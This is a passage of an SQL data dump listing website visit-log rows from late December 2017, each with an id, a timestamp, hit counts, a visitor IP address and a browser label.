,(192669,1514607984,2,2,0,0,'40.77.167.61','other'),(192670,1514608394,1,1,0,0,'54.36.149.56','other'),(192671,1514608819,1,1,0,0,'51.255.71.127','other'),(192672,1514608995,1,1,0,0,'54.36.148.145','other'),(192673,1514609532,1,0,1,0,'66.249.64.28',''),(192674,1514609699,2,2,0,0,'91.209.11.236','other'),(192675,1514610157,1,1,0,0,'54.36.149.100','other'),(192676,1514610464,1,1,0,0,'54.36.149.32','other'),(192677,1514610678,2,2,0,0,'91.209.11.236','other'),(192678,1514611406,1,1,0,0,'54.36.148.24','other'),(192679,1514611921,1,1,0,0,'54.36.148.245','other'),(192680,1514612209,1,0,1,0,'66.249.64.29',''),(192681,1514612615,1,1,0,0,'54.36.148.101','other'),(192682,1514612910,1,1,0,0,'66.249.70.27','chrome'),(192683,1514612929,1,1,0,0,'66.249.64.29','chrome'),(192684,1514613115,1,1,0,0,'54.36.148.143','other'),(192685,1514613313,1,1,0,0,'8.29.198.26','other'),(192686,1514613466,1,1,0,0,'107.167.108.16','other'),(192687,1514613989,1,1,0,0,'54.36.148.173','other'),(192688,1514613992,1,0,1,0,'66.249.64.29',''),(192689,1514614025,1,1,0,0,'54.36.149.45','other'),(192690,1514614231,1,1,0,0,'54.36.148.251','other'),(192691,1514614699,1,1,0,0,'54.36.148.97','other'),(192692,1514614746,1,1,0,0,'54.36.149.85','other'),(192693,1514615678,1,1,0,0,'54.36.148.150','other'),(192694,1514615860,1,0,1,0,'66.249.64.30',''),(192695,1514616010,1,1,0,0,'51.255.71.121','other'),(192696,1514616187,1,1,0,0,'95.132.10.220','chrome'),(192697,1514616244,1,1,0,0,'54.36.148.105','other'),(192698,1514616363,1,1,0,0,'54.36.149.1','other'),(192699,1514617281,1,1,0,0,'54.36.148.142','other'),(192700,1514617373,1,1,0,0,'54.36.148.129','other'),(192701,1514617617,1,1,0,0,'54.36.149.4','other'),(192702,1514617743,1,1,0,0,'54.36.148.114','other'),(192703,1514618392,1,1,0,0,'54.36.148.103','other'),(192704,1514618910,1,1,0,0,'54.36.148.93','other'),(192705,1514618962,1,1,0,0,'54.36.148.193','other'),(192706,1514618979,1,1,0,0,'92.113.157.221','chrome'),(192707,1514619071,1,1,0,0,'54.36.149.72','other'),(192708,1514619203,1,1,0,0,'54.36.148.245','other'),(192709,1514619261,1,1,0,0,'82.145.220.196','chrome'),(192710,1514619489,1,0,1,0,'66.249.70.25',''),(192711,1514619665,1,0,1,0,'66.249.64.28',''),(192712,1514619666,2,1,1,0,'66.249.64.30',''),(192713,1514619674,2,1,1,0,'66.249.64.29',''),(192714,1514619704,1,1,0,0,'54.36.148.236','other'),(192715,1514620060,1,1,0,0,'74.115.214.132','other'),(192716,1514620839,1,1,0,0,'54.36.148.107','other'),(192717,1514621532,1,1,0,0,'54.36.149.50','other'),(192718,1514621569,1,1,0,0,'54.36.148.251','other'),(192719,1514621661,1,0,1,0,'66.249.70.27',''),(192720,1514622072,1,1,0,0,'54.36.148.59','other'),(192721,1514622140,1,1,0,0,'54.36.149.47','other'),(192722,1514622226,1,1,0,0,'54.36.149.66','other'),(192723,1514623066,2,2,0,0,'141.8.142.74','other'),(192724,1514623295,2,2,0,0,'207.46.13.98','other'),(192725,1514623300,1,1,0,0,'92.113.157.221','chrome'),(192726,1514623390,1,0,1,0,'66.249.64.29',''),(192727,1514623780,1,1,0,0,'54.36.148.31','other'),(192728,1514624143,1,1,0,0,'8.29.198.25','other'),(192729,1514624189,1,1,0,0,'95.158.31.10','chrome'),(192730,1514624241,2,2,0,0,'178.154.171.88','other'),(192731,1514624476,1,0,1,0,'66.249.64.29',''),(192732,1514625136,1,1,0,0,'54.36.148.207','other'),(192733,1514625139,2,2,0,0,'141.8.142.74','other'),(192734,1514625157,1,1,0,0,'54.36.149.74','other'),(192735,1514625437,1,1,0,0,'54.36.148.155','other'),(192736,1514625479,1,1,0,0,'178.95.67.53','other'),(192737,1514625655,1,1,0,0,'51.255.71.118','other'),(192738,1514625821,1,1,0,0,'54.36.148.74','other'),(192739,1514625985,1,1,0,0,'54.36.148.25','other'),(192740,1514626099,1,1,0,0,'66.249.70.25','chrome'),(192741,1514626122,1,1,0,0,'66.249.64.30','chrome'),(192742,1514626354,1,1,0,0,'91.124.82.210','firefox'),(192743,1514626355,1,1,0,0,'66.249.70.27','chrome'),(192744,1514626445,2,2,0,0,'141.8.142.74','other'),(192745,1514626478,1,1,0,0,'54.36.148.29','other'),(192746,1514626726,2,2,0,0,'144.76.38.40','other'),(192747,1514626974,1,1,0,0,'54.36.149.27','other'),(192748,1514627042,1,0,1,0,'66.249.70.29',''),(192749,1514627085,1,1,0,0,'54.36.149.39','other'),(192750,1514627095,1,1,0,0,'54.36.148.141','other'),(192751,1514627594,1,1,0,0,'141.8.142.74','other'),(192752,1514627722,1,1,0,0,'54.36.149.50','other'),(192753,1514628185,1,1,0,0,'54.36.148.100','other'),(192754,1514628246,1,1,0,0,'54.36.149.46','other'),(192755,1514628329,1,1,0,0,'188.255.23.130','msie'),(192756,1514628924,1,1,0,0,'178.154.171.55','other'),(192757,1514629248,1,1,0,0,'54.36.148.173','other'),(192758,1514629423,1,1,0,0,'54.36.148.18','other'),(192759,1514629472,1,1,0,0,'54.36.149.3','other'),(192760,1514629734,1,0,1,0,'66.249.70.29',''),(192761,1514629878,1,1,0,0,'54.36.148.244','other'),(192762,1514629942,2,2,0,0,'178.154.171.88','other'),(192763,1514630284,1,1,0,0,'54.36.148.88','other'),(192764,1514630288,1,1,0,0,'51.255.71.122','other'),(192765,1514630754,1,1,0,0,'54.36.148.230','other'),(192766,1514630771,1,1,0,0,'141.8.142.74','other'),(192767,1514631146,1,1,0,0,'54.36.148.111','other'),(192768,1514631446,1,1,0,0,'40.77.167.52','other'),(192769,1514631814,1,0,1,0,'66.249.64.30',''),(192770,1514631841,1,1,0,0,'54.36.148.190','other'),(192771,1514631883,1,1,0,0,'54.36.148.123','other'),(192772,1514632063,2,2,0,0,'94.112.176.16','chrome'),(192773,1514632072,1,1,0,0,'37.9.113.101','other'),(192774,1514632173,1,1,0,0,'37.9.113.132','other'),(192775,1514632412,1,1,0,0,'37.9.113.82','other'),(192776,1514632415,1,1,0,0,'178.154.171.24','other'),(192777,1514632418,1,1,0,0,'178.154.171.10','other'),(192778,1514632425,1,1,0,0,'54.36.148.48','other'),(192779,1514633009,1,1,0,0,'178.154.171.88','other'),(192780,1514633134,1,1,0,0,'141.8.142.74','other'),(192781,1514633232,1,1,0,0,'54.36.148.178','other'),(192782,1514633456,1,1,0,0,'54.36.148.119','other'),(192783,1514633565,1,1,0,0,'207.46.13.72','other'),(192784,1514633577,1,1,0,0,'54.36.148.45','other'),(192785,1514633597,1,1,0,0,'54.36.148.20','other'),(192786,1514633826,1,1,0,0,'54.36.149.53','other'),(192787,1514633898,1,1,0,0,'54.36.148.144','other'),(192788,1514633918,1,1,0,0,'54.36.148.134','other'),(192789,1514634130,1,0,1,0,'66.249.64.30',''),(192790,1514634384,1,1,0,0,'54.36.149.83','other'),(192791,1514634400,1,1,0,0,'54.36.149.101','other'),(192792,1514634546,1,1,0,0,'54.36.149.13','other'),(192793,1514634556,1,1,0,0,'54.36.148.33','other'),(192794,1514634923,1,1,0,0,'54.36.148.14','other'),(192795,1514634982,1,1,0,0,'8.29.198.27','other'),(192796,1514635197,1,1,0,0,'54.36.148.235','other'),(192797,1514635397,1,1,0,0,'54.36.148.187','other'),(192798,1514635522,1,1,0,0,'54.36.149.19','other'),(192799,1514635555,1,0,1,0,'66.249.64.28',''),(192800,1514635735,1,1,0,0,'54.36.149.6','other'),(192801,1514635777,1,1,0,0,'54.36.148.232','other'),(192802,1514636222,1,1,0,0,'54.36.149.61','other'),(192803,1514636473,1,1,0,0,'141.8.142.74','other'),(192804,1514636727,1,0,1,0,'66.249.64.29',''),(192805,1514636949,1,1,0,0,'178.154.171.88','other'),(192806,1514637695,1,1,0,0,'54.36.148.169','other'),(192807,1514637797,1,1,0,0,'54.36.148.252','other'),(192808,1514638275,1,1,0,0,'54.36.148.120','other'),(192809,1514638550,1,1,0,0,'54.36.149.30','other'),(192810,1514639001,1,1,0,0,'54.36.148.137','other'),(192811,1514639136,1,1,0,0,'54.36.148.176','other'),(192812,1514639477,1,1,0,0,'54.36.148.126','other'),(192813,1514639996,1,0,1,0,'66.249.64.29',''),(192814,1514640044,1,1,0,0,'54.36.148.125','other'),(192815,1514640434,1,1,0,0,'54.36.148.97','other'),(192816,1514640661,1,1,0,0,'54.36.148.79','other'),(192817,1514640756,2,2,0,0,'216.244.66.237','other'),(192818,1514640871,1,1,0,0,'54.36.149.98','other'),(192819,1514640974,1,1,0,0,'207.46.13.72','other'),(192820,1514642415,2,1,1,0,'66.249.64.28',''),(192821,1514643897,1,0,1,0,'66.249.70.27',''),(192822,1514645073,1,0,1,0,'66.249.70.27',''),(192823,1514645820,1,1,0,0,'8.29.198.27','other'),(192824,1514645848,1,1,0,0,'91.196.178.72','firefox'),(192825,1514646958,1,1,0,0,'91.196.178.167','chrome'),(192826,1514647057,1,0,1,0,'66.249.64.29',''),(192827,1514647374,1,1,0,0,'54.36.148.168','other'),(192828,1514647532,1,1,0,0,'51.255.71.120','other'),(192829,1514647578,1,1,0,0,'54.36.149.9','other'),(192830,1514647764,1,1,0,0,'54.36.149.0','other'),(192831,1514647852,1,1,0,0,'213.87.152.245','other'),(192832,1514648051,1,1,0,0,'54.36.148.40','other'),(192833,1514648282,1,1,0,0,'54.36.149.33','other'),(192834,1514648405,1,1,0,0,'141.8.142.74','other'),(192835,1514648943,1,1,0,0,'54.36.148.136','other'),(192836,1514649209,1,1,0,0,'54.36.148.230','other'),(192837,1514649279,1,1,0,0,'91.124.239.226','chrome'),(192838,1514649328,1,1,0,0,'54.36.149.36','other'),(192839,1514649676,1,1,0,0,'54.36.148.245','other'),(192840,1514649935,1,1,0,0,'54.36.148.31','other'),(192841,1514650431,1,1,0,0,'54.36.148.203','other'),(192842,1514650848,1,1,0,0,'54.36.148.167','other'),(192843,1514651045,1,1,0,0,'54.36.149.28','other'),(192844,1514651161,1,1,0,0,'51.255.71.116','other'),(192845,1514651194,1,1,0,0,'54.36.148.242','other'),(192846,1514651196,1,1,0,0,'54.36.148.248','other'),(192847,1514651250,1,1,0,0,'66.249.64.29','chrome'),(192848,1514652264,1,1,0,0,'207.46.13.57','other'),(192849,1514652268,1,0,1,0,'66.249.64.29',''),(192850,1514652302,1,1,0,0,'157.55.39.125','other'),(192851,1514653288,1,1,0,0,'91.196.178.43','chrome'),(192852,1514653307,1,1,0,0,'54.36.148.161','other'),(192853,1514654155,1,1,0,0,'54.36.148.162','other'),(192854,1514654214,1,1,0,0,'54.36.148.193','other'),(192855,1514654403,1,1,0,0,'54.36.148.250','other'),(192856,1514654544,1,1,0,0,'54.36.149.75','other'),(192857,1514654560,1,1,0,0,'54.36.148.207','other'),(192858,1514655267,1,0,1,0,'66.249.64.28',''),(192859,1514655729,1,1,0,0,'54.36.148.50','other'),(192860,1514655744,1,1,0,0,'54.36.148.62','other'),(192861,1514655817,1,1,0,0,'66.249.64.30','chrome'),(192862,1514655824,1,1,0,0,'66.249.70.29','chrome'),(192863,1514655917,1,1,0,0,'54.36.149.68','other'),(192864,1514656659,1,1,0,0,'8.29.198.25','other'),(192865,1514656933,1,1,0,0,'54.36.148.62','other'),(192866,1514657264,1,1,0,0,'54.36.149.29','other'),(192867,1514657288,1,1,0,0,'162.210.196.100','other'),(192868,1514657785,1,1,0,0,'54.36.148.131','other'),(192869,1514657804,1,1,0,0,'54.36.148.201','other'),(192870,1514657827,1,1,0,0,'54.36.148.150','other'),(192871,1514658252,1,1,0,0,'157.55.39.151','other'),(192872,1514658254,1,1,0,0,'157.55.39.253','other'),(192873,1514658556,1,1,0,0,'54.36.148.233','other'),(192874,1514658602,1,1,0,0,'54.36.148.170','other'),(192875,1514658621,1,1,0,0,'54.36.148.194','other'),(192876,1514658669,1,1,0,0,'95.24.18.54','msie'),(192877,1514658672,1,1,0,0,'176.14.10.12','msie'),(192878,1514658924,1,1,0,0,'77.111.244.29','chrome'),(192879,1514659163,1,1,0,0,'54.36.149.101','other'),(192880,1514659378,2,2,0,0,'141.8.142.74','other'),(192881,1514659463,1,1,0,0,'157.55.39.253','other'),(192882,1514659829,1,0,1,0,'66.249.64.28',''),(192883,1514660162,1,0,1,0,'66.249.64.29',''),(192884,1514662562,1,1,0,0,'157.55.39.253','other'),(192885,1514662811,1,1,0,0,'188.163.81.82','firefox'),(192886,1514663186,1,1,0,0,'37.73.213.220','chrome'),(192887,1514663995,1,1,0,0,'141.8.142.74','other'),(192888,1514664627,1,1,0,0,'198.37.118.9','firefox'),(192889,1514665068,1,1,0,0,'141.8.142.74','other'),(192890,1514665716,1,1,0,0,'216.244.66.237','other'),(192891,1514666092,1,1,0,0,'141.8.142.74','other'),(192892,1514667499,1,1,0,0,'8.29.198.26','other'),(192893,1514667798,1,1,0,0,'141.8.142.74','other'),(192894,1514668712,1,0,1,0,'66.249.64.28',''),(192895,1514669002,1,1,0,0,'141.8.142.74','other'),(192896,1514669071,1,1,0,0,'37.54.18.14','chrome'),(192897,1514670385,1,1,0,0,'40.77.167.161','other'),(192898,1514672095,1,0,1,0,'66.249.64.30',''),(192899,1514673153,2,2,0,0,'54.165.59.7','other'),(192900,1514673158,1,1,0,0,'141.8.142.74','other'),(192901,1514674339,1,0,1,0,'66.249.70.27',''),(192902,1514674757,1,1,0,0,'157.55.39.253','other'),(192903,1514674842,1,1,0,0,'54.165.59.7','other'),(192904,1514675819,2,2,0,0,'141.8.142.74','other'),(192905,1514675974,1,1,0,0,'198.37.118.9','firefox'),(192906,1514676761,2,2,0,0,'141.8.142.74','other'),(192907,1514677441,1,1,0,0,'110.77.206.213','other'),(192908,1514677486,1,1,0,0,'157.55.39.164','other'),(192909,1514678323,1,1,0,0,'141.8.142.74','other'),(192910,1514678334,1,1,0,0,'8.29.198.27','other'),(192911,1514681179,1,1,0,0,'141.8.142.74','other'),(192912,1514684124,1,1,0,0,'108.59.8.70','other'),(192913,1514685425,1,1,0,0,'157.55.39.140','other'),(192914,1514685849,1,1,0,0,'178.154.171.88','other'),(192915,1514687901,1,1,0,0,'157.55.39.253','other'),(192916,1514688024,2,2,0,0,'91.209.11.236','other'),(192917,1514688098,1,1,0,0,'54.36.148.76','other'),(192918,1514688136,1,1,0,0,'54.36.149.102','other'),(192919,1514688165,1,1,0,0,'54.36.148.82','other'),(192920,1514688391,1,1,0,0,'54.36.148.177','other'),(192921,1514688420,1,1,0,0,'54.36.148.105','other'),(192922,1514689170,1,1,0,0,'8.29.198.25','other'),(192923,1514689378,1,1,0,0,'207.46.13.13','other'),(192924,1514689477,1,1,0,0,'54.36.149.4','other'),(192925,1514689478,1,0,1,0,'66.249.70.25',''),(192926,1514690072,1,1,0,0,'157.55.39.253','other'),(192927,1514690668,1,1,0,0,'91.209.11.236','other'),(192928,1514691386,1,1,0,0,'54.36.148.200','other'),(192929,1514691504,1,1,0,0,'54.36.148.247','other'),(192930,1514691572,1,1,0,0,'91.209.11.236','other'),(192931,1514692110,1,1,0,0,'54.36.148.22','other'),(192932,1514692236,1,1,0,0,'54.36.149.103','other'),(192933,1514692444,2,2,0,0,'141.8.142.74','other'),(192934,1514692482,1,1,0,0,'51.255.71.116','other'),(192935,1514692619,1,1,0,0,'37.9.113.63','other'),(192936,1514692790,1,1,0,0,'54.36.149.67','other'),(192937,1514692899,1,1,0,0,'54.36.149.64','other'),(192938,1514693181,1,1,0,0,'54.36.149.72','other'),(192939,1514693214,1,1,0,0,'54.36.149.76','other'),(192940,1514693254,1,1,0,0,'54.36.148.156','other'),(192941,1514693642,1,1,0,0,'54.36.148.12','other'),(192942,1514694058,1,1,0,0,'54.36.148.179','other'),(192943,1514694162,1,1,0,0,'54.36.148.240','other'),(192944,1514694777,1,1,0,0,'54.36.149.8','other'),(192945,1514694981,1,1,0,0,'54.36.149.6','other'),(192946,1514695268,1,1,0,0,'54.36.148.86','other'),(192947,1514696026,1,1,0,0,'54.36.149.75','other'),(192948,1514696381,1,1,0,0,'54.36.148.68','other'),(192949,1514696903,1,1,0,0,'54.36.148.188','other'),(192950,1514697003,1,1,0,0,'54.36.149.25','other'),(192951,1514697086,1,1,0,0,'54.36.149.71','other'),(192952,1514698074,1,1,0,0,'54.36.149.30','other'),(192953,1514698534,1,1,0,0,'54.36.148.45','other'),(192954,1514698646,1,1,0,0,'54.36.148.165','other'),(192955,1514698670,1,1,0,0,'54.36.148.97','other'),(192956,1514699005,1,1,0,0,'54.36.148.205','other'),(192957,1514699415,1,1,0,0,'54.36.149.61','other'),(192958,1514699444,1,1,0,0,'54.36.148.182','other'),(192959,1514699470,1,1,0,0,'54.36.149.12','other'),(192960,1514699492,1,1,0,0,'54.36.148.120','other'),(192961,1514699617,1,1,0,0,'54.36.148.89','other'),(192962,1514700012,1,1,0,0,'8.29.198.27','other'),(192963,1514700141,1,1,0,0,'51.255.71.131','other'),(192964,1514700428,1,1,0,0,'54.36.149.68','other'),(192965,1514700824,1,1,0,0,'54.36.148.10','other'),(192966,1514700852,1,1,0,0,'54.36.149.98','other'),(192967,1514701581,1,1,0,0,'54.36.148.197','other'),(192968,1514701806,1,1,0,0,'54.36.148.37','other'),(192969,1514701874,2,2,0,0,'54.36.148.89','other'),(192970,1514702008,1,1,0,0,'107.167.116.106','other'),(192971,1514702645,1,1,0,0,'54.36.149.7','other'),(192972,1514703479,1,1,0,0,'54.36.148.81','other'),(192973,1514703488,1,1,0,0,'54.36.149.102','other'),(192974,1514703879,1,1,0,0,'54.36.148.197','other'),(192975,1514703954,1,1,0,0,'13.56.229.65','chrome'),(192976,1514704288,1,1,0,0,'54.36.149.93','other'),(192977,1514704534,1,1,0,0,'212.237.3.30','other'),(192978,1514704806,1,1,0,0,'54.36.148.122','other'),(192979,1514705085,1,1,0,0,'54.36.148.127','other'),(192980,1514705183,47,47,0,0,'5.9.89.170','other'),(192981,1514705783,1,1,0,0,'54.36.148.178','other'),(192982,1514705883,1,1,0,0,'54.36.148.181','other'),(192983,1514706504,1,0,1,0,'66.249.64.30',''),(192984,1514706584,1,1,0,0,'54.36.148.153','other'),(192985,1514706787,1,1,0,0,'54.36.148.69','other'),(192986,1514706906,1,1,0,0,'54.36.148.130','other'),(192987,1514707145,1,1,0,0,'91.209.11.236','other'),(192988,1514707567,1,1,0,0,'54.36.148.88','other'),(192989,1514707759,1,1,0,0,'54.36.148.129','other'),(192990,1514707904,1,1,0,0,'54.36.149.60','other'),(192991,1514708119,1,1,0,0,'54.36.149.23','other'),(192992,1514708980,1,1,0,0,'54.36.149.69','other'),(192993,1514709562,1,1,0,0,'51.255.71.121','other'),(192994,1514709720,1,1,0,0,'51.255.71.118','other'),(192995,1514709915,1,1,0,0,'54.36.148.65','other'),(192996,1514710443,1,1,0,0,'54.36.149.37','other'),(192997,1514710554,1,1,0,0,'54.36.149.5','other'),(192998,1514710639,1,1,0,0,'54.36.148.81','other'),(192999,1514710843,1,1,0,0,'92.113.126.60','chrome'),(193000,1514710852,1,1,0,0,'8.29.198.27','other'),(193001,1514710907,1,1,0,0,'54.36.148.57','other'),(193002,1514711077,1,1,0,0,'54.36.149.33','other'),(193003,1514711354,1,1,0,0,'54.36.148.51','other'),(193004,1514711686,1,1,0,0,'54.36.149.105','other'),(193005,1514711870,1,1,0,0,'54.36.149.8','other'),(193006,1514712278,1,1,0,0,'91.209.11.236','other'),(193007,1514712527,1,1,0,0,'54.36.149.69','other'),(193008,1514712741,1,1,0,0,'54.36.148.205','other'),(193009,1514712789,1,1,0,0,'91.196.178.60','chrome'),(193010,1514712956,1,1,0,0,'54.36.148.235','other'),(193011,1514713244,1,1,0,0,'54.36.148.180','other'),(193012,1514713355,1,1,0,0,'207.46.13.179','other'),(193013,1514713428,1,1,0,0,'54.36.148.251','other'),(193014,1514713932,1,1,0,0,'91.209.11.236','other'),(193015,1514714029,1,1,0,0,'54.36.148.143','other'),(193016,1514714450,1,1,0,0,'94.45.147.67','chrome'),(193017,1514714641,1,1,0,0,'54.36.148.199','other'),(193018,1514715031,1,1,0,0,'54.36.148.176','other'),(193019,1514715497,1,1,0,0,'54.36.149.75','other'),(193020,1514715569,1,1,0,0,'92.113.126.60','chrome'),(193021,1514715724,1,1,0,0,'91.209.11.236','other'),(193022,1514715980,1,1,0,0,'54.36.148.62','other'),(193023,1514716163,1,1,0,0,'141.8.132.19','other'),(193024,1514716673,2,2,0,0,'91.209.11.236','other'),(193025,1514716683,1,1,0,0,'54.36.149.62','other'),(193026,1514716761,1,1,0,0,'54.36.148.37','other'),(193027,1514716841,1,1,0,0,'54.36.148.192','other'),(193028,1514717137,1,1,0,0,'54.36.148.13','other'),(193029,1514717982,1,1,0,0,'54.36.148.176','other'),(193030,1514718122,1,1,0,0,'54.36.149.65','other'),(193031,1514718399,1,1,0,0,'54.36.149.76','other'),(193032,1514718831,1,1,0,0,'51.255.71.114','other'),(193033,1514719026,1,1,0,0,'51.255.71.131','other'),(193034,1514719165,1,1,0,0,'54.36.149.39','other'),(193035,1514719716,1,1,0,0,'91.209.11.236','other'),(193036,1514720333,1,1,0,0,'54.36.149.101','other'),(193037,1514720485,1,1,0,0,'54.36.148.36','other'),(193038,1514721037,1,1,0,0,'54.36.148.145','other'),(193039,1514721321,1,1,0,0,'54.36.148.41','other'),(193040,1514721692,1,1,0,0,'8.29.198.27','other'),(193041,1514721937,1,1,0,0,'54.36.148.29','other'),(193042,1514721993,1,1,0,0,'54.36.148.15','other'),(193043,1514722180,1,1,0,0,'54.36.148.191','other'),(193044,1514722208,1,1,0,0,'91.209.11.236','other'),(193045,1514722369,1,1,0,0,'54.36.148.34','other'),(193046,1514722555,6,6,0,0,'47.90.213.249','firefox'),(193047,1514722759,1,1,0,0,'54.36.149.63','other'),(193048,1514722792,1,1,0,0,'54.36.149.50','other'),(193049,1514722917,1,1,0,0,'54.36.148.190','other'),(193050,1514723026,1,1,0,0,'54.36.148.151','other'),(193051,1514723588,1,1,0,0,'93.73.80.121','chrome'),(193052,1514723810,1,1,0,0,'54.36.148.132','other'),(193053,1514724528,1,1,0,0,'51.255.71.117','other'),(193054,1514725218,1,1,0,0,'54.36.148.135','other'),(193055,1514725562,1,1,0,0,'54.36.149.27','other'),(193056,1514725771,1,1,0,0,'54.36.148.172','other'),(193057,1514725792,1,1,0,0,'54.36.148.231','other'),(193058,1514725898,2,2,0,0,'54.36.149.106','other'),(193059,1514725971,1,1,0,0,'91.209.11.236','other'),(193060,1514726128,1,1,0,0,'207.46.13.179','other'),(193061,1514727105,2,2,0,0,'40.77.167.161','other'),(193062,1514727271,1,1,0,0,'54.36.148.90','other'),(193063,1514727848,1,1,0,0,'54.36.149.74','other'),(193064,1514727922,1,1,0,0,'54.36.148.168','other'),(193065,1514728237,1,1,0,0,'54.36.148.142','other'),(193066,1514728248,1,1,0,0,'51.255.71.129','other'),(193067,1514728257,1,1,0,0,'54.36.148.122','other'),(193068,1514728406,1,1,0,0,'54.36.148.169','other'),(193069,1514728469,1,1,0,0,'54.36.148.129','other'),(193070,1514728505,1,1,0,0,'95.132.57.27','chrome'),(193071,1514728506,2,2,0,0,'91.209.11.236','other'),(193072,1514728547,1,1,0,0,'54.36.148.231','other'),(193073,1514729189,1,1,0,0,'54.36.148.89','other'),(193074,1514729228,1,1,0,0,'54.36.148.197','other'),(193075,1514729355,1,1,0,0,'216.244.66.246','other'),(193076,1514729510,1,1,0,0,'54.36.149.34','other'),(193077,1514729834,1,1,0,0,'54.36.148.158','other'),(193078,1514729903,1,1,0,0,'54.36.148.24','other'),(193079,1514730099,1,1,0,0,'54.36.149.13','other'),(193080,1514730237,1,1,0,0,'54.36.148.151','other'),(193081,1514730459,1,1,0,0,'92.113.174.79','chrome'),(193082,1514731148,1,1,0,0,'77.111.244.30','chrome'),(193083,1514731252,1,1,0,0,'91.209.11.236','other'),(193084,1514731732,1,1,0,0,'54.36.149.27','other'),(193085,1514731798,1,1,0,0,'54.36.148.113','other'),(193086,1514731812,1,1,0,0,'54.36.148.76','other'),(193087,1514731815,1,1,0,0,'54.36.148.196','other'),(193088,1514732138,1,1,0,0,'54.36.148.189','other'),(193089,1514732219,1,1,0,0,'37.55.56.119','chrome'),(193090,1514732535,1,1,0,0,'8.29.198.27','other'),(193091,1514732735,1,1,0,0,'54.36.148.143','other'),(193092,1514733068,1,1,0,0,'54.36.149.29','other'),(193093,1514733143,1,1,0,0,'54.36.149.41','other'),(193094,1514733200,1,1,0,0,'54.36.148.137','other'),(193095,1514733755,1,1,0,0,'54.36.148.17','other'),(193096,1514733757,1,1,0,0,'207.46.13.58','other'),(193097,1514733810,1,1,0,0,'40.77.167.45','other'),(193098,1514733862,1,1,0,0,'54.36.149.100','other'),(193099,1514734169,1,1,0,0,'54.36.149.52','other'),(193100,1514734234,1,1,0,0,'54.165.59.7','other'),(193101,1514734705,1,1,0,0,'54.36.148.107','other'),(193102,1514734732,1,1,0,0,'54.36.148.160','other'),(193103,1514734733,1,1,0,0,'54.36.149.79','other'),(193104,1514734781,1,1,0,0,'54.36.148.72','other'),(193105,1514735201,1,1,0,0,'40.77.167.45','other'),(193106,1514735700,1,1,0,0,'54.36.148.109','other'),(193107,1514735718,1,1,0,0,'91.196.178.166','chrome'),(193108,1514735840,1,1,0,0,'54.36.149.7','other'),(193109,1514735875,1,1,0,0,'54.36.148.244','other'),(193110,1514736311,1,1,0,0,'54.36.148.96','other'),(193111,1514736377,1,1,0,0,'54.36.149.44','other'),(193112,1514736530,1,1,0,0,'54.36.148.237','other'),(193113,1514736678,1,1,0,0,'35.225.221.87','other'),(193114,1514736921,1,1,0,0,'51.255.71.126','other'),(193115,1514736924,1,1,0,0,'54.36.149.93','other'),(193116,1514737073,1,1,0,0,'54.36.149.11','other'),(193117,1514737097,1,1,0,0,'54.36.149.102','other'),(193118,1514737151,1,0,1,0,'66.249.64.28',''),(193119,1514737798,1,1,0,0,'91.196.178.42','chrome'),(193120,1514737965,1,1,0,0,'54.36.148.79','other'),(193121,1514738503,1,1,0,0,'66.249.93.205','chrome'),(193122,1514738509,1,1,0,0,'46.101.60.72','chrome'),(193123,1514739084,1,1,0,0,'54.36.148.112','other'),(193124,1514739242,1,1,0,0,'54.36.148.89','other'),(193125,1514739343,1,1,0,0,'54.36.149.95','other'),(193126,1514739409,1,1,0,0,'54.36.148.62','other'),(193127,1514740150,1,1,0,0,'51.255.71.129','other'),(193128,1514740274,1,1,0,0,'111.20.46.107','other'),(193129,1514740280,1,1,0,0,'110.77.215.110','other'),(193130,1514740283,1,1,0,0,'152.251.75.111','other'),(193131,1514740287,1,1,0,0,'138.68.65.168','firefox'),(193132,1514740289,2,2,0,0,'94.177.250.24','other'),(193134,1514740292,1,1,0,0,'202.142.149.77','other'),(193135,1514740296,1,1,0,0,'116.58.227.46','other'),(193136,1514740297,1,1,0,0,'177.205.68.252','other'),(193137,1514740299,1,1,0,0,'186.241.112.41','other'),(193138,1514740300,1,1,0,0,'209.63.239.153','other'),(193139,1514740302,1,1,0,0,'110.77.215.133','other'),(193140,1514740304,1,1,0,0,'110.77.212.123','other'),(193142,1514740306,1,1,0,0,'103.253.146.48','other'),(193143,1514740309,1,1,0,0,'109.72.229.114','other'),(193144,1514740314,1,1,0,0,'45.32.39.194','other'),(193146,1514740317,1,1,0,0,'35.202.143.92','other'),(193147,1514740318,1,1,0,0,'223.207.139.251','other'),(193148,1514740320,1,1,0,0,'110.77.239.34','other'),(193149,1514740321,1,1,0,0,'180.247.12.6','other'),(193150,1514740324,1,1,0,0,'110.77.226.234','other'),(193151,1514740327,1,1,0,0,'144.217.91.67','other'),(193152,1514740341,1,1,0,0,'103.94.213.130','chrome'),(193153,1514740342,1,1,0,0,'144.217.91.67','opera'),(193154,1514740343,2,2,0,0,'187.20.97.68','other'),(193155,1514740344,1,1,0,0,'61.7.169.254','other'),(193156,1514740347,1,1,0,0,'54.36.148.149','other'),(193157,1514740349,1,1,0,0,'61.7.131.72','other'),(193158,1514740355,1,1,0,0,'171.96.113.171','other'),(193159,1514740375,1,1,0,0,'94.177.252.206','other'),(193160,1514740462,1,1,0,0,'51.255.71.132','other'),(193161,1514740585,1,1,0,0,'54.36.148.137','other'),(193162,1514741062,1,1,0,0,'54.36.149.21','other'),(193163,1514741195,1,1,0,0,'54.36.148.35','other'),(193164,1514741360,1,1,0,0,'54.36.148.112','other'),(193165,1514741496,1,1,0,0,'54.36.149.45','other'),(193166,1514741840,1,1,0,0,'51.255.71.130','other'),(193167,1514741979,1,1,0,0,'54.36.148.235','other'),(193168,1514741982,1,1,0,0,'54.36.149.50','other'),(193169,1514742264,1,1,0,0,'54.36.149.54','other'),(193170,1514742338,1,1,0,0,'54.36.148.90','other'),(193171,1514742371,1,1,0,0,'54.36.148.35','other'),(193172,1514742482,1,1,0,0,'54.36.148.243','other'),(193173,1514742599,1,1,0,0,'54.36.149.67','other'),(193174,1514742662,1,1,0,0,'108.59.8.80','other'),(193175,1514742896,1,1,0,0,'54.36.149.76','other'),(193176,1514742940,1,1,0,0,'54.36.148.236','other'),(193177,1514743031,1,0,1,0,'66.249.64.30',''),(193178,1514743259,1,1,0,0,'95.135.241.25','chrome'),(193179,1514743372,1,1,0,0,'8.29.198.25','other'),(193180,1514743500,1,1,0,0,'54.36.148.166','other'),(193181,1514743591,1,1,0,0,'54.36.148.119','other'),(193182,1514743691,1,1,0,0,'54.36.148.138','other'),(193183,1514744078,1,1,0,0,'91.196.178.162','other'),(193184,1514744141,1,1,0,0,'54.36.149.98','other'),(193185,1514744164,1,1,0,0,'54.36.148.89','other'),(193186,1514744245,1,1,0,0,'207.46.13.44','other'),(193187,1514744